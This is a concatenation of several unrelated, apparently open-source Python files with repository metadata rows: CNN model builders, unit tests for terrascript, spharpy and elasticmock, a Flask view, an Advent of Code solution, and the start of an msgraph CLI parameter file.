def _cnn_2layer(in_ch, in_dim, width, linear_size, activation):
    # Two 4x4 stride-2 convs halve the spatial size twice: in_dim -> in_dim // 4.
    return nn.Sequential(
        nn.Conv2d(in_ch, 4 * width, 4, stride=2, padding=1),
        activation(),
        nn.Conv2d(4 * width, 8 * width, 4, stride=2, padding=1),
        activation(),
        Flatten(),
        nn.Linear(8 * width * (in_dim // 4) * (in_dim // 4), linear_size),
        activation(),
        nn.Linear(linear_size, 10)
    )


def model_cnn_2layer(in_ch, in_dim, width, linear_size=128):
    return _cnn_2layer(in_ch, in_dim, width, linear_size, nn.ReLU)


def prelu_model_cnn_2layer(in_ch, in_dim, width, linear_size=128):
    return _cnn_2layer(in_ch, in_dim, width, linear_size, nn.PReLU)


def leaky_model_cnn_2layer(in_ch, in_dim, width, linear_size=128):
    return _cnn_2layer(in_ch, in_dim, width, linear_size, nn.LeakyReLU)


def _cnn_3layer_fixed(in_ch, in_dim, kernel_size, width, linear_size, activation):
    if linear_size is None:
        linear_size = width * 64
    if kernel_size == 5:
        h = (in_dim - 4) // 4
    elif kernel_size == 3:
        h = in_dim // 4
    else:
        raise ValueError("Unsupported kernel size")
    return nn.Sequential(
        nn.Conv2d(in_ch, 4 * width, kernel_size=kernel_size, stride=1, padding=1),
        activation(),
        nn.Conv2d(4 * width, 8 * width, kernel_size=kernel_size, stride=1, padding=1),
        activation(),
        nn.Conv2d(8 * width, 8 * width, kernel_size=4, stride=4, padding=0),
        activation(),
        Flatten(),
        nn.Linear(8 * width * h * h, linear_size),
        activation(),
        nn.Linear(linear_size, 10)
    )


def model_cnn_3layer_fixed(in_ch, in_dim, kernel_size, width, linear_size=None):
    return _cnn_3layer_fixed(in_ch, in_dim, kernel_size, width, linear_size, nn.ReLU)


def prelu_model_cnn_3layer_fixed(in_ch, in_dim, kernel_size, width, linear_size=None):
    return _cnn_3layer_fixed(in_ch, in_dim, kernel_size, width, linear_size, nn.PReLU)


def _cnn_4layer(in_ch, in_dim, width, linear_size, activation):
    return nn.Sequential(
        nn.Conv2d(in_ch, 4 * width, 3, stride=1, padding=1),
        activation(),
        nn.Conv2d(4 * width, 4 * width, 4, stride=2, padding=1),
        activation(),
        nn.Conv2d(4 * width, 8 * width, 3, stride=1, padding=1),
        activation(),
        nn.Conv2d(8 * width, 8 * width, 4, stride=2, padding=1),
        activation(),
        Flatten(),
        nn.Linear(8 * width * (in_dim // 4) * (in_dim // 4), linear_size),
        activation(),
        nn.Linear(linear_size, linear_size),
        activation(),
        nn.Linear(linear_size, 10)
    )


def model_cnn_4layer(in_ch, in_dim, width, linear_size):
    return _cnn_4layer(in_ch, in_dim, width, linear_size, nn.ReLU)


def prelu_model_cnn_4layer(in_ch, in_dim, width, linear_size):
    return _cnn_4layer(in_ch, in_dim, width, linear_size, nn.PReLU)
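The `in_dim // 4` factor in the linear layers above reflects two halvings of the spatial size (two stride-2 convs, or one stride-4 conv). A torch-free check of that feature-count arithmetic:

```python
def flat_features_2layer(in_dim, width):
    # After two 4x4, stride-2, padding-1 convs, an in_dim x in_dim map
    # shrinks to (in_dim // 4) x (in_dim // 4) with 8 * width channels.
    h = in_dim // 4
    return 8 * width * h * h

# e.g. a 32x32 input with width 2 flattens to 1024 features
print(flat_features_2layer(32, 2))  # 1024
```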
| 32.259542 | 88 | 0.576668 | 635 | 4,226 | 3.680315 | 0.083465 | 0.124091 | 0.077022 | 0.055627 | 0.962773 | 0.962773 | 0.962773 | 0.958922 | 0.95122 | 0.95122 | 0 | 0.055718 | 0.269522 | 4,226 | 130 | 89 | 32.507692 | 0.701328 | 0 | 0 | 0.85 | 0 | 0 | 0.010888 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.008333 | 0.008333 | 0.15 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6db7917b2cbaa10d8d0a619d88707582fa4788a4 | 887 | py | Python | tests/test_provider_AdrienneCohea_vaultutility.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 507 | 2017-07-26T02:58:38.000Z | 2022-01-21T12:35:13.000Z | tests/test_provider_AdrienneCohea_vaultutility.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 135 | 2017-07-20T12:01:59.000Z | 2021-10-04T22:25:40.000Z | tests/test_provider_AdrienneCohea_vaultutility.py | mjuenema/python-terrascript | 6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d | [
"BSD-2-Clause"
] | 81 | 2018-02-20T17:55:28.000Z | 2022-01-31T07:08:40.000Z | # tests/test_provider_AdrienneCohea_vaultutility.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:30:15 UTC)
def test_provider_import():
    import terrascript.provider.AdrienneCohea.vaultutility


def test_resource_import():
    from terrascript.resource.AdrienneCohea.vaultutility import (
        vaultutility_initialization,
    )
    from terrascript.resource.AdrienneCohea.vaultutility import vaultutility_unseal
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.AdrienneCohea.vaultutility
#
# t = terrascript.provider.AdrienneCohea.vaultutility.vaultutility()
# s = str(t)
#
# assert 'https://github.com/AdrienneCohea/terraform-provider-vaultutility' in s
# assert '0.0.3' in s
| 30.586207 | 85 | 0.766629 | 103 | 887 | 6.485437 | 0.543689 | 0.224551 | 0.197605 | 0.197605 | 0.347305 | 0.197605 | 0.197605 | 0 | 0 | 0 | 0 | 0.019868 | 0.148816 | 887 | 28 | 86 | 31.678571 | 0.864901 | 0.613303 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035714 | 0 | 1 | 0.285714 | true | 0 | 0.714286 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
6dcb7322397260289e1af232bbdd5d9e438cd20c | 179 | py | Python | backend-flask-sqlalchemy/exemplo_tech_store/TechApp/views.py | santiagosilas/dweb20192-vuejs | d6b322c075682247ca2e1eb70c9c64d27d741fa2 | [
"MIT"
] | 1 | 2020-11-12T15:27:20.000Z | 2020-11-12T15:27:20.000Z | cap_07_flask_sqlalchemy/exemplo_tech_store/TechApp/views.py | santiagosilas/BasicoFlaskDevWeb | de7b952427e453b365c84a7f26882174d5cb13ae | [
"MIT"
] | 36 | 2019-12-05T10:39:07.000Z | 2022-02-27T10:34:55.000Z | backend-flask-sqlalchemy/exemplo_tech_store/TechApp/views.py | santiagosilas/dweb20192-vuejs | d6b322c075682247ca2e1eb70c9c64d27d741fa2 | [
"MIT"
] | null | null | null | from TechApp import app
from flask import render_template, redirect, url_for, request
@app.route('/')
@app.route('/home')
def homepage():
return render_template('index.html')
| 19.888889 | 61 | 0.743017 | 25 | 179 | 5.2 | 0.72 | 0.215385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117318 | 179 | 8 | 62 | 22.375 | 0.822785 | 0 | 0 | 0 | 0 | 0 | 0.089888 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | true | 0 | 0.333333 | 0.166667 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
6deac8e1e0cb385101dbec6080d4cf372fc5d278 | 7,163 | py | Python | tests/test_special.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_special.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | tests/test_special.py | mberz/spharpy | e74c30c297dd9ad887e7345c836a515daa6f21f4 | [
"MIT"
] | null | null | null | """
Tests for special functions
"""
import pytest
from spharpy import special
from spharpy import samplings
import numpy as np
import numpy.testing as npt
def genfromtxt_complex(filename, delimiter=','):
"""generate complex numpy array from csv file."""
data_str = np.genfromtxt(filename, delimiter=delimiter, dtype=str)
mapping = np.vectorize(lambda t: complex(t.replace('i', 'j')))
return mapping(data_str)
class TestBessel(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_bessel(n, z)
shape = (2, 10)
assert shape == res.shape
def test_val(self):
z = np.linspace(0, 10, 25)
n = [0, 1, 2]
res = special.spherical_bessel(n, z)
truth = np.genfromtxt('./tests/data/bessel.csv', delimiter=',')
npt.assert_allclose(res, truth)
class TestBesselPrime(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_bessel(n, z, derivative=True)
shape = (2, 10)
assert shape == res.shape
def test_val(self):
z = np.linspace(0.1, 10, 25)
n = [0, 1, 2]
res = special.spherical_bessel(n, z, derivative=True)
truth = np.genfromtxt('./tests/data/bessel_diff.csv', delimiter=',')
npt.assert_allclose(res, truth)
class TestHankel(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_hankel(n, z, kind=1)
shape = (2, 10)
assert shape == res.shape
def test_kind_exception(self):
with pytest.raises(ValueError):
special.spherical_hankel([0], [1], kind=3)
def test_val_second_kind(self):
z = np.linspace(0.1, 5, 25)
n = np.array([0, 1, 2])
res = special.spherical_hankel(n, z, kind=2)
truth = genfromtxt_complex('./tests/data/hankel_2.csv', delimiter=',')
npt.assert_allclose(res, truth)
def test_val_first_kind(self):
z = np.linspace(0.1, 5, 25)
n = np.array([0, 1, 2])
res = special.spherical_hankel(n, z, kind=1)
truth = genfromtxt_complex('./tests/data/hankel_1.csv', delimiter=',')
npt.assert_allclose(res, truth)
class TestHankelPrime(object):
def test_shape(self):
n = np.array([0, 1])
z = np.linspace(0.1, 5, 10)
res = special.spherical_hankel(n, z, kind=1, derivative=True)
shape = (2, 10)
assert shape == res.shape
def test_kind_exception(self):
with pytest.raises(ValueError):
special.spherical_hankel([0], [1], kind=3, derivative=True)
def test_val_second_kind(self):
z = np.linspace(0.1, 5, 25)
n = [0, 1, 2]
res = special.spherical_hankel(n, z, kind=2, derivative=True)
truth = genfromtxt_complex('./tests/data/hankel_2_diff.csv', delimiter=',')
npt.assert_allclose(res, truth)
def test_val_first_kind(self):
z = np.linspace(0.1, 5, 25)
n = [0, 1, 2]
res = special.spherical_hankel(n, z, kind=1, derivative=True)
truth = genfromtxt_complex('./tests/data/hankel_1_diff.csv', delimiter=',')
npt.assert_allclose(res, truth)
def test_spherical_harmonic_derivative_theta():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_ele.csv',
dtype=np.complex,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_theta(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_derivative_phi():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_diff_azi.csv',
dtype=np.complex,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_phi(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_gradient_phi():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_azi.csv',
dtype=np.complex,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_gradient_phi(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_derivative_theta_real():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_real_ele.csv',
dtype=np.double,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_theta_real(
n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_derivative_phi_real():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_diff_real_azi.csv',
dtype=np.double,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_derivative_phi_real(
n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
def test_spherical_harmonic_gradient_phi_real():
n_max = 5
theta = np.array([np.pi/2, np.pi/2, 0, np.pi/2, np.pi/4])
phi = np.array([0, np.pi/2, 0, np.pi/4, np.pi/4])
n_points = np.size(theta)
desired_all = np.genfromtxt(
'./tests/data/Y_grad_real_azi.csv',
dtype=np.double,
delimiter=',')
for acn in range((n_max+1)**2):
n = int((np.ceil(np.sqrt(acn + 1)) - 1))
m = int(acn - n**2 - n)
actual = special.spherical_harmonic_gradient_phi_real(n, m, theta, phi)
desired = desired_all[:, acn]
npt.assert_allclose(actual, desired, rtol=1e-10, atol=1e-10)
| 30.480851 | 83 | 0.59207 | 1,109 | 7,163 | 3.686204 | 0.08927 | 0.041096 | 0.029354 | 0.020548 | 0.905333 | 0.905333 | 0.880382 | 0.861301 | 0.80455 | 0.80455 | 0 | 0.044044 | 0.248778 | 7,163 | 234 | 84 | 30.611111 | 0.715666 | 0.009912 | 0 | 0.748538 | 0 | 0 | 0.049866 | 0.047747 | 0 | 0 | 0 | 0 | 0.093567 | 1 | 0.111111 | false | 0 | 0.02924 | 0 | 0.169591 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
099217c9e953853d15c67f719f31623ca19a7a40 | 1,414 | py | Python | tests/fake_elasticsearch/test_sort.py | g3rg0/elasticmock | eddf55e6b17a775d455e98ad3647e5ad65e22b4f | [
"MIT"
] | null | null | null | tests/fake_elasticsearch/test_sort.py | g3rg0/elasticmock | eddf55e6b17a775d455e98ad3647e5ad65e22b4f | [
"MIT"
] | 2 | 2021-03-24T15:07:48.000Z | 2021-04-07T09:51:39.000Z | tests/fake_elasticsearch/test_sort.py | g3rg0/elasticmock | eddf55e6b17a775d455e98ad3647e5ad65e22b4f | [
"MIT"
] | 4 | 2020-08-20T17:36:02.000Z | 2021-11-30T22:37:24.000Z | from tests import TestElasticmock, INDEX_NAME, DOC_TYPE
class TestSearch(TestElasticmock):

    def test_sort_by_field_asc(self):
        index_quantity = 10
        result = []
        for i in range(0, index_quantity):
            body = {'data': 'test_{0}'.format(i), 'sort_param': '{0}'.format(i)}
            result.append(body)
            self.es.index(index=INDEX_NAME, doc_type=DOC_TYPE, body=body)

        search = self.es.search(body={'query': {'match_all': {}},
                                      'sort': [{'sort_param': {'order': 'asc'}}]})

        search_result = [hit.get('_source') for hit in search.get('hits').get('hits')]
        self.assertListEqual(result, search_result)

    def test_sort_by_field_desc(self):
        index_quantity = 10
        result = []
        for i in range(0, index_quantity):
            body = {'data': 'test_{0}'.format(i), 'sort_param': '{0}'.format(i)}
            result.append(body)
            self.es.index(index=INDEX_NAME, doc_type=DOC_TYPE, body=body)

        search = self.es.search(body={'query': {'match_all': {}},
                                      'sort': [{'sort_param': {'order': 'desc'}}]})

        search_result = [hit.get('_source') for hit in search.get('hits').get('hits')]
        result.reverse()
        self.assertListEqual(result, search_result)
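The ordering these tests assert reduces to sorting hit documents by a field value. Roughly, in plain Python (a sketch of the expected behavior, not elasticmock's internals):

```python
hits = [{'data': 'test_2', 'sort_param': '2'},
        {'data': 'test_0', 'sort_param': '0'},
        {'data': 'test_1', 'sort_param': '1'}]

asc = sorted(hits, key=lambda h: h['sort_param'])
desc = sorted(hits, key=lambda h: h['sort_param'], reverse=True)
print([h['data'] for h in asc])   # ['test_0', 'test_1', 'test_2']
print([h['data'] for h in desc])  # ['test_2', 'test_1', 'test_0']
```

Note that `sort_param` is stored as a string, so lexicographic order coincides with numeric order only for the single-digit values these tests index.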
| 41.588235 | 86 | 0.535361 | 163 | 1,414 | 4.435583 | 0.263804 | 0.048409 | 0.04426 | 0.06639 | 0.857538 | 0.705394 | 0.705394 | 0.705394 | 0.705394 | 0.705394 | 0 | 0.010256 | 0.310467 | 1,414 | 33 | 87 | 42.848485 | 0.731282 | 0 | 0 | 0.740741 | 0 | 0 | 0.108204 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 1 | 0.074074 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
09bd9647817c19ec169e93e55b222c2a7ae98c90 | 1,519 | py | Python | 2020/day3.py | paaraujo/Advent-of-Code | 5e22f9212f65c4ffc6e1a9d86e6ed792e0ac16bf | [
"MIT"
] | null | null | null | 2020/day3.py | paaraujo/Advent-of-Code | 5e22f9212f65c4ffc6e1a9d86e6ed792e0ac16bf | [
"MIT"
] | null | null | null | 2020/day3.py | paaraujo/Advent-of-Code | 5e22f9212f65c4ffc6e1a9d86e6ed792e0ac16bf | [
"MIT"
] | null | null | null | import math
def part1():
    with open('inputs/day3.txt') as f:
        forest = [list(line.rstrip('\n')) for line in f]
    rows = len(forest)
    cols = len(forest[0])
    row = 0
    col = 1
    right = 3
    down = 1
    trees = 0
    while True:
        if col + right > cols:
            col = ((col + right) - cols)
        else:
            col += right
        if row < rows - down:
            row += down
        else:
            break
        element = forest[row][col - 1]
        if element == '#':
            trees += 1
    return trees


def part2():
    with open('inputs/day3.txt') as f:
        forest = [list(line.rstrip('\n')) for line in f]
    rows = len(forest)
    cols = len(forest[0])
    row = 0
    col = 1
    trees = 0
    slopes = [[1, 1], [3, 1], [5, 1], [7, 1], [1, 2]]
    result = []
    for right, down in slopes:
        while True:
            if col + right > cols:
                col = ((col + right) - cols)
            else:
                col += right
            if row < rows - down:
                row += down
            else:
                break
            element = forest[row][col - 1]
            if element == '#':
                trees += 1
        result.append(trees)
        col = 1
        row = 0
        trees = 0
    return math.prod(result)


print(part1())
print(part2())
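A quick way to sanity-check the traversal logic above is the published Advent of Code 2020 day 3 sample map, whose answers are 7 (slope right 3, down 1) and 336 (product over all five slopes). The helper below re-expresses the same wrap-around walk with modular arithmetic; `count_trees` is an illustrative rewrite, not the author's function:

```python
import math


def count_trees(forest, right, down):
    # Same walk as part1/part2 above, with the column wrap done via modulo.
    rows, cols = len(forest), len(forest[0])
    row = col = trees = 0
    while row + down < rows:
        row += down
        col = (col + right) % cols
        if forest[row][col] == '#':
            trees += 1
    return trees


SAMPLE = """..##.......
#...#...#..
.#....#..#.
..#.#...#.#
.#...##..#.
..#.##.....
.#.#.#....#
.#........#
#.##...#...
#...##....#
.#..#...#.#""".splitlines()

print(count_trees(SAMPLE, 3, 1))  # 7
print(math.prod(count_trees(SAMPLE, r, d)
                for r, d in [(1, 1), (3, 1), (5, 1), (7, 1), (1, 2)]))  # 336
```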
# File: msgraph-cli-extensions/v1_0/personalcontacts_v1_0/azext_personalcontacts_v1_0/generated/_params.py (repo: thewahome/msgraph-cli, MIT license)
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from msgraph.cli.core.commands.validators import validate_file_or_dict
from azext_personalcontacts_v1_0.action import (
    AddBusinessAddress,
    AddEmailAddresses,
    AddExtensions,
    AddPersonalcontactsUserCreateContactMultiValueExtendedProperties,
    AddPhoto,
    AddPersonalcontactsUserCreateContactSingleValueExtendedProperties,
    AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties,
    AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties
)
def load_arguments(self, _):
    with self.argument_context('personalcontacts user create-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('categories', nargs='+', help='The categories associated with the item')
        c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
                   'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
                   'object. Read-only.')
        c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
                   'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
                   '\'2014-01-01T00:00:00Z\'')
        c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
                   '8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
                   'this: \'2014-01-01T00:00:00Z\'')
        c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
        c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
                   'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
                   'look like this: \'2014-01-01T00:00:00Z\'')
        c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('business_home_page', type=str, help='The business home page of the contact.')
        c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
        c.argument('children', nargs='+', help='The names of the contact\'s children.')
        c.argument('company_name', type=str, help='The name of the contact\'s company.')
        c.argument('department', type=str, help='The contact\'s department.')
        c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
                   'create or update operation. Note that later updates to other properties may cause an automatically '
                   'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
                   'value, always include it as displayName in an update operation.')
        c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
        c.argument('file_as', type=str, help='The name the contact is filed under.')
        c.argument('generation', type=str, help='The contact\'s generation.')
        c.argument('given_name', type=str, help='The contact\'s given name.')
        c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
        c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
        c.argument('initials', type=str, help='The contact\'s initials.')
        c.argument('job_title', type=str, help='The contact’s job title.')
        c.argument('manager', type=str, help='The name of the contact\'s manager.')
        c.argument('middle_name', type=str, help='The contact\'s middle name.')
        c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
        c.argument('nick_name', type=str, help='The contact\'s nickname.')
        c.argument('office_location', type=str, help='The location of the contact\'s office.')
        c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
        c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
        c.argument('profession', type=str, help='The contact\'s profession.')
        c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
        c.argument('surname', type=str, help='The contact\'s surname.')
        c.argument('title', type=str, help='The contact\'s title.')
        c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
        c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
        c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
        c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
                   'the contact. Read-only. Nullable.')
        c.argument('multi_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
                   'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
        c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
        c.argument('single_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
                   'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
    with self.argument_context('personalcontacts user create-contact-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('display_name', type=str, help='The folder\'s display name.')
        c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
        c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
                   'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
                   'Read-only. Nullable. Expected value: json-string/@json-file.')
        c.argument('multi_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
                   'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
        c.argument('single_value_extended_properties',
                   action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
                   help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
                   'Nullable.')
    with self.argument_context('personalcontacts user delete-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_id', type=str, help='key: id of contact')
        c.argument('if_match', type=str, help='ETag')
    with self.argument_context('personalcontacts user delete-contact-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('if_match', type=str, help='ETag')
    with self.argument_context('personalcontacts user list-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('orderby', nargs='+', help='Order items by property values')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user list-contact-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('orderby', nargs='+', help='Order items by property values')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user show-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_id', type=str, help='key: id of contact')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user show-contact-folder') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
        c.argument('select', nargs='+', help='Select properties to be returned')
        c.argument('expand', nargs='+', help='Expand related entities')
    with self.argument_context('personalcontacts user update-contact') as c:
        c.argument('user_id', type=str, help='key: id of user')
        c.argument('contact_id', type=str, help='key: id of contact')
        c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
        c.argument('categories', nargs='+', help='The categories associated with the item')
        c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
                   'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
                   'object. Read-only.')
        c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
                   'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
                   '\'2014-01-01T00:00:00Z\'')
        c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
                   '8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
                   'this: \'2014-01-01T00:00:00Z\'')
        c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
        c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
                   'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
                   'look like this: \'2014-01-01T00:00:00Z\'')
        c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
        c.argument('business_home_page', type=str, help='The business home page of the contact.')
        c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
        c.argument('children', nargs='+', help='The names of the contact\'s children.')
